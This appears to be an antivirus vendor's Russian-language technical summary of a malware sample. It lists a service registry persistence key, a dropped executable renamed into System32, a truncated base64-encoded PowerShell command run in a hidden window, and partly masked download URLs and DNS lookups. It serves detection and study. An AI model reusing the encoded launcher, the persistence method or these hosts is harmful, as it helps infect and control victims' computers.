Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\excemetrics] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\excemetrics] 'ImagePath' = '"<SYSTEM32>\excemetrics.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAGIAcQBiAHcAaQBwAHcAcQA9ACcASQBvAGsAZwBkAGEAdgBhACcAOwAkAFQAbgBmAG0AZAByAHUAcwBuAGQAIAA9ACAAJwAxADgANwAnADsAJABXAGEAbQBmAGUAZwBlAGIAcQBjAGMAYwA9ACcASgB6AHYAbQBiAHkAdwBpAGoAeAAnADsAJABZAH...
- %HOMEPATH%\187.exe
- %HOMEPATH%\187.exe в <SYSTEM32>\excemetrics.exe
- http://cr#.###universal.com/user_privileges/ZHxZ101162/
- http://10#.##1.41.185:8080/93Cx8qSya1 via 10#.#31.41.185
- DNS ASK ac######on.mathetmots.com
- DNS ASK cr#.###universal.com
- '%HOMEPATH%\187.exe'
- '<SYSTEM32>\excemetrics.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAGIAcQBiAHcAaQBwAHcAcQA9ACcASQBvAGsAZwBkAGEAdgBhACcAOwAkAFQAbgBmAG0AZAByAHUAcwBuAGQAIAA9ACAAJwAxADgANwAnADsAJABXAGEAbQBmAGUAZwBlAGIAcQBjAGMAYwA9ACcASgB6AHYAbQBiAHkAdwBpAGoAeAAnADsAJABZAH...' (со скрытым окном)